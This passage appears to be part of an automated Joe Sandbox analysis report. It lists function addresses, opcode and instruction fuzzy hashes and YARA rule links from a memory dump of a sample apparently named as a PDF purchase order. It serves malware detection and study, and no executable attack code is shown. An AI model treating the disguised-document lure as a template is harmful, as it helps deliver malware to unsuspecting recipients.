Instruction ID: 868d5dc3887dba87439af54adfce90588f079ff25fd963250e38761f48734576
Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
Instruction Fuzzy Hash: 8F01D132200A869FDB23AA1DC849FA9FB9CEF55750F0940E5FE048B6A1D779C940C251

Function 018161E5 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 185a8964926c8dcd6744414c46845b0f235b979eff1d0674c4a899be9d1b6f06
Instruction ID: cbd6a8e7edfceec6044bb5355c509811f3fd99c536ffd879f3fd68022cb82817
Opcode Fuzzy Hash: 185a8964926c8dcd6744414c46845b0f235b979eff1d0674c4a899be9d1b6f06
Instruction Fuzzy Hash: 10018F71A0024A9BCB00EFA9D445AEEBBF8BF58314F14005AF901E7280E774EA01CB94

Function 017C63C0 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
Instruction ID: 76b2fda426fa827103d65a60bf0fed837bbd6d2264bb432d3066c7e5570d5f7a
Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
Instruction Fuzzy Hash: A0F01D7220011DBFEF019F94DD80DAFBB7EEB597D8B104129FA11A2160D631DE21ABA0

Function 017CA4B0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc32802f43bcf4718cf46a99892a8def7a40f04dd8e2c42a97100f988d7fb751
Instruction ID: 435aa761e9de84b43cd880823cca52cc9534955d1cf26058f49f44c0b44b520e
Opcode Fuzzy Hash: cc32802f43bcf4718cf46a99892a8def7a40f04dd8e2c42a97100f988d7fb751
Instruction Fuzzy Hash: 9701893650010DABCF129E84D840EDEBF66FB5C755F058209FE1866220C336D971EF81

Function 0173C0F0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07453009358b521fde02bf5995d42076919f226921fa0cf26c0691784a67b0e1
Instruction ID: f04a1a675788c46f051642ad37f37a42c41c43028c415c64eb1f8afcdc20f78a
Opcode Fuzzy Hash: 07453009358b521fde02bf5995d42076919f226921fa0cf26c0691784a67b0e1
Instruction Fuzzy Hash: DFF024B23082415BF716961D9C01B22F39AF7C0650F65807BEB059B2C6EA71DC0183A4

Function 0177656A Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d461731349051e2ce7b8cf95d23f23b50735805722fb87dca7a3e7cda726045b
Instruction ID: 24310f978acff240637e56286853dd02bd86077eb08e277e876cb71d910bf6f9
Opcode Fuzzy Hash: d461731349051e2ce7b8cf95d23f23b50735805722fb87dca7a3e7cda726045b
Instruction Fuzzy Hash: 0101A470205B82DFF722972CCD4CF65B7E4BB40B40F5805A4BA02DB6EBD768D541C610

Function 017E437C Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
Instruction ID: 5782e946c8dc9b8bbbeb23c4d5071be97ae08b0943270ee30dc481b0acc81cd6
Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
Instruction Fuzzy Hash: E3F02E35341D1347EB76AE2D841CB2FE6D59FD8D40B15052C9A43EB644DF60DC00C7A0

Function 017CE872 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
Instruction ID: 18e0f60eb2a06e8206e9156836e8f60116bbd03e6c6e27860a87a76f71071653
Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
Instruction Fuzzy Hash: 6CF03A326916129BE3219A4ECC80F17FBA8EB95F60F59146DAA149B264CB60EC4187A0

Function 017CC89D Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc242e6a08bb17fef9175d81b9528e218e774c9dd84045567057165c7bbd548b
Instruction ID: 1f75ec389ae3f2f26f94aeb587f43ddd58c571647a22a8002d789c2a639c1ad4
Opcode Fuzzy Hash: cc242e6a08bb17fef9175d81b9528e218e774c9dd84045567057165c7bbd548b
Instruction Fuzzy Hash: D8F08C706053049FC310EF68C446A1BF7E4EF98710F40465EB898DB394E634EA01CB96

Function 01770854 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
Instruction ID: efead5211e60db5eb31f209de441420a2eedf815892d999cb8008e7e800bcf88
Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
Instruction Fuzzy Hash: F4F0E9B2650204AFE714DF25CC05F56F7E9EF9D340F148078A945D7264FAB0ED11D654

Function 017C8D20 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7748d330dd90a685063d540ffb8b401e19fcc215dd074c57488707f98432effd
Instruction ID: 20a7bea462e6e0be7e25bafb239b169af0ff127b3edcad14d794b93ff614f433
Opcode Fuzzy Hash: 7748d330dd90a685063d540ffb8b401e19fcc215dd074c57488707f98432effd
Instruction Fuzzy Hash: E7F0B4725006446BE7216A1CE888B5AFB5DFBD8B20F0D041DF9596711587746DC0CBC0

Function 017CC912 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1e3f8b183671bfa9613ab5e9bd319d7994a19eccf0635e7fb2177eb73fc9e21
Instruction ID: 22ea38caf1981b7a8a3ba6d7d106908ca08e78b2e65f1a948378bf1f69df2675
Opcode Fuzzy Hash: e1e3f8b183671bfa9613ab5e9bd319d7994a19eccf0635e7fb2177eb73fc9e21
Instruction Fuzzy Hash: BDF04F70A012499FCB04EFA9C515AAEF7B4EF18700F108159B959EB395DA74EA01CB50

Function 017447FB Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f609c2d98cb39391aaf2f6982c45a421923c19860f7993aa3c6eb2a9c5e2cbfb
Instruction ID: a6128b8d0d8ef6781d8a47ceba48e704d3634090120dcd08bfea87f67950f148
Opcode Fuzzy Hash: f609c2d98cb39391aaf2f6982c45a421923c19860f7993aa3c6eb2a9c5e2cbfb
Instruction Fuzzy Hash: 8AF0BE319966E19FF732CB6CC044B21FBDC9B00730F0989AAD98B87902C775D880D651

Function 01800115 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42350961bb2c6f766a191738da18f6e5607b3d5f0c83f0b31e1947dc78088c08
Instruction ID: ee19aebaacd5edb5585563f37aa79449d217b5e67dd6afbf88d6c4fa33ee9851
Opcode Fuzzy Hash: 42350961bb2c6f766a191738da18f6e5607b3d5f0c83f0b31e1947dc78088c08
Instruction Fuzzy Hash: E6F05C2751AEC856CF735B3C7C543D26F65A742260F2E1889EDA4D734AD5788783C720

Function 0177C5ED Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 174874763eeb97c37cf1bc048180c8aea0ee1304a710293de61fe74be995a07e
Instruction ID: 304425dac1c94bc536eee0a4905ed6e31bd3c99fb78f183d8fc19e069c7c6fa2
Opcode Fuzzy Hash: 174874763eeb97c37cf1bc048180c8aea0ee1304a710293de61fe74be995a07e
Instruction Fuzzy Hash: B9F0E2715156539FEB23971CC1C8B11FBD89B087B1F099865D906C7512C760E880CA51

Function 01782619 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
Instruction ID: 69db4ecac8c0aa194b0c420893f318a3bdad3575d0766af70f83785e8e06c41e
Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
Instruction Fuzzy Hash: CEE0D8723406412BE712AE598CC4F57B76EDFD6B14F040079BA045F256CAE2DC09C2A4

Function 017D6030 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Instruction ID: d4a48b406c10331beec3b57b8f8e3c8adfd56e5b5f1080cee173fd3b450707fc
Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Instruction Fuzzy Hash: 90F06572154208DFE3218F49D944F62F7F8EB05364F45C065F6099B561D379EC40CBA4

Function 01740710 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction ID: e7ec00fed9c00e3282911f292d192e91fe18ef9524b500843d152d28c9abfc42
Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction Fuzzy Hash: 6FF0ED3A204745DBEF16DF19D040AE9FBA8FB41360B000098FE428B351EB31E982CB91

Function 017749D0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction ID: 9aa265cb8b29859f66430a2f8dd457f7f60c93f1996f9f3ef447440213bfd5d9
Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction Fuzzy Hash: 29E0D832654185ABDB223A698808B6AF7A5EBD47A0F170429E6028B160EB70DD40D7D8

Function 017E678E Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
Instruction ID: 712535ba84d036e2dd262db3369eaeb1845e68c80379535304eef62dfcffb0f0
Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
Instruction Fuzzy Hash: D4E04F72A40114BBDF2297998D09F9AFEECDBA8EA0F154055BA01EB194E570EE40D690

Function 017425E0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8cb4b644a126abe2f9b1ebef39fa0b02ba23df65b0c2a3db666883c4721acf2c
Instruction ID: 45adf3514ce957d61fa552d73f804964444e9ccd0b81064fda355d68139e0aae
Opcode Fuzzy Hash: 8cb4b644a126abe2f9b1ebef39fa0b02ba23df65b0c2a3db666883c4721acf2c
Instruction Fuzzy Hash: 6AE0D832100554ABC322FF29DD05F8BBBDAEF603A0F114515F115571A5CB30AD10D7D8

Function 017C4000 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction ID: 02d2d76de2d587f9044c55a22b82325199696423339629ba696e038774d41b22
Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction Fuzzy Hash: 5AE0C2343403058FE715CF19C050B62BBB6BFD5B10F28C0ACA9498F205EB32E882CB40

Function 0177CA38 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20b0ee748b53cc1578c69265264774d10236ea1064e5594407fd606090ee9900
Instruction ID: 2f15274c1c987301bcfe10f87f5a735292be3dfd7e10dae290d28f8230bb8d62
Opcode Fuzzy Hash: 20b0ee748b53cc1578c69265264774d10236ea1064e5594407fd606090ee9900
Instruction Fuzzy Hash: 75D02B325850626ECF77F1187C08F93BB5D9B48321F074CA0FA0892015D564CD8197C4

Function 0173823B Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
Instruction ID: 3c4392c30f5c3341f00717ee050dee1114502bff9579d2ec51831a9c1f7266bc
Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
Instruction Fuzzy Hash: 97E0C231049A20EFDB323F25EC04F51FAE1FF94B51F254A69F081070AA87B4AC81CB45

Function 01742050 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5888504c9a66c06d55b7c60c00c237a89c17114eb7fa49c2919e100f13e42c21
Instruction ID: 53d101a2455ba3a1c2b69c680f53e644f8a01b2e66cfd84bcb5afe138cfc0f76
Opcode Fuzzy Hash: 5888504c9a66c06d55b7c60c00c237a89c17114eb7fa49c2919e100f13e42c21
Instruction Fuzzy Hash: F5E0C2321004506BC312FF5DED00F4AB39EEFA43A0F140121F151876E8CB70AD00D7A4

Function 01778A90 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
Instruction ID: 84d0d02cd4c869748a57eb7c4dd072cedda0e97f62135a4f053343f865b92546
Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
Instruction Fuzzy Hash: 46E08633511B1487C728EE18D515B72B7A4EF45720F09463EA61347780C534E544C795

Function 01796AA4 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
Instruction ID: 978446b1274710e9888278d9860f9353488e805840bccc8f498dfca45c3d8fe9
Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
Instruction Fuzzy Hash: 09D05E36511A50AFC7329F1BEA04C13FBF9FBC5B507050A2EA54583A24C674A806CBA0

Function 0177E59C Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction ID: 38c5d20ab7bebeb59ffb12e40afa768ffa28a0992222943776da2e053d3fb3ca
Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction Fuzzy Hash: AED0A7325045105BD7729A1CFC04FC373D8BB48760F050459B114C7150C760AC41C644

Function 017BE908 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
Instruction ID: 0f3447cf29834c5df75229a32f12fffcfb029bb02aac595a2aad09c64fa60707
Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
Instruction Fuzzy Hash: B1E0EC359506849BDF52DF59C684F9AFBB9FB94B40F150454A5085B664CB34A900CB40

Function 0173A0E3 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction ID: 3a32981d6b432eeaeb8177b633e0c2ce7ac1c28958be6ed03757bb80422df3b2
Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction Fuzzy Hash: 8CD0223221303193CB2896556804F63EA15ABC0AD0F1A006C380AD3800C4148C42C2E0

Function 0177A830 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
Instruction ID: 7f6305cef16b3c0ed302bd44d65a8b06839a4fff224c56dd79a96f257d99e84d
Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
Instruction Fuzzy Hash: 70D012371D054DBBCB119F66DC01F957BA9E764BA0F444420B914875A0CA7AE950D584

Function 0177CA24 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9973babed4477f3fd3d3d42dcdd5703a3473f7572d830e70b5c5a7cdab1cb7fa
Instruction ID: 366d3858a8c3771c768b01ee751776b6791064b977efffc4ae698f58ddfd509e
Opcode Fuzzy Hash: 9973babed4477f3fd3d3d42dcdd5703a3473f7572d830e70b5c5a7cdab1cb7fa
Instruction Fuzzy Hash: D6D0A930601802DBDF2BEF08CA50EAEFFB8FF18681F5000ACEB0092020E728DE01DA10

Function 017502A0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
Instruction ID: 4bda25b0b6a39418d06af965aa58e48b03ca8fa87bdd16c8a87dd4bc23176b74
Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
Instruction Fuzzy Hash: 5DD0C935216E80CFD76BCB0CC5A4B15B3A4BB84B84FC504D0F802CBB22DABCD940CA00

Function 0177C700 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction ID: 42bf6c9feaf2c74271d18e6dd1bfdabe61383c11580841794ff865af87a381b7
Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction Fuzzy Hash: 12C08033150644AFC711DF95CD01F0177A9F798B40F000421F70447570C571FC10D644

Function 01760310 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: bf0a00da25f6e599d6031266425a188d9283030da7e7c7f90a3f9ea787e5f177
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: 47D01236100288EFCB05DF41C890D9AB72AFBD8710F108019FD19076108A31ED62DA50

Function 01740750 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction ID: 51e4d7e5a255e069fd903c57539dac51ec0d9351a56ec2be5a896856965a5277
Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction Fuzzy Hash: 2CC04C757016418FCF15DB19D294F45B7F4F744740F150890E845CB721E664E845CA10

Function 01814DAD Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
Instruction ID: fb6082ac6852efbbce0fc114ffe6b26a48f41e47238569c92b17eacbded7fbdf
Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
Instruction Fuzzy Hash: DEB01232216545CFC7026720CB04B1872ADBF017C0F0A00F0690089831D6188910E501

Function 01782890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0178293C
___swprintf_l.LIBCMT ref: 0178295E
___swprintf_l.LIBCMT ref: 017829A3
___swprintf_l.LIBCMT ref: 017BA52E

Strings

ffff:, xrefs: 017BA504
::ffff:0:%u.%u.%u.%u, xrefs: 017BA54E
:%u.%u.%u.%u, xrefs: 017BA5B8
::%hs%u.%u.%u.%u, xrefs: 017BA527

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID: ___swprintf_l
